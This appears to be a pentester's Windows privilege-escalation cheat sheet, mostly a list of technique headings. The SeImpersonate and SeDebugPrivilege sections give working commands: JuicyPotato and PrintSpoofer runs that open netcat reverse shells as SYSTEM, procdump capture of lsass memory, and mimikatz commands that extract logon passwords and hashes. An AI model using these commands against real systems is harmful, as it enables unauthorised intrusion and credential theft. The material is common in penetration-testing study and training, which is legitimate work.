Privilege Escalation Techniques
SeImpersonate and SeAssignPrimaryToken
c:\\tools\\JuicyPotato.exe -l 53375 -p c:\\windows\\system32\\cmd.exe -a "/c c:\\tools\\nc.exe ip 8443 -e cmd.exe" -t *# start a listener on kali and run this command on windows target host PrintSpoofer.exe -c "c:\\tools\\nc.exe ip 8443 -e cmd"
SeDebugPrivilege
procdump.exe -accepteula -ma lsass.exe lsass.dmp# Starting mimikatz mimikatz.exe # extracting hashes from lsass.dmp file sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords# First, open an elevated PowerShell console (right-click, run as admin, and type in the credentials for the user). # Next, type tasklist to get a listing of running processes and accompanying PIDs. tasklist # running poc to get system shell, or reverse shell as system .\\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")
SeTakeOwnershipPrivilege
Backup Operators Group / SeBackupPrivilege
Attacking a Domain Controller - Copying NTDS.dit
Event Log Readers Group
DnsAdmins Group
Leveraging DnsAdmins Access
Cleaning Up
Using Mimilib.dll
Print Operators Group
Server Operators Group
Weak Permissions
Permissive File System ACLs
Weak Service Permissions
Cleanup
Unquoted Service Path
Kernel Exploits
Vulnerable Services
Credential Theft
Manually Searching the File System for Credentials
Saved Credentials
Lazagne
Wifi Passwords
Pillaging
Installed Applications
AlwaysInstallElevated
Scheduled Tasks
User/Computer Description Field
Mount VHDX/VMDK
Last updated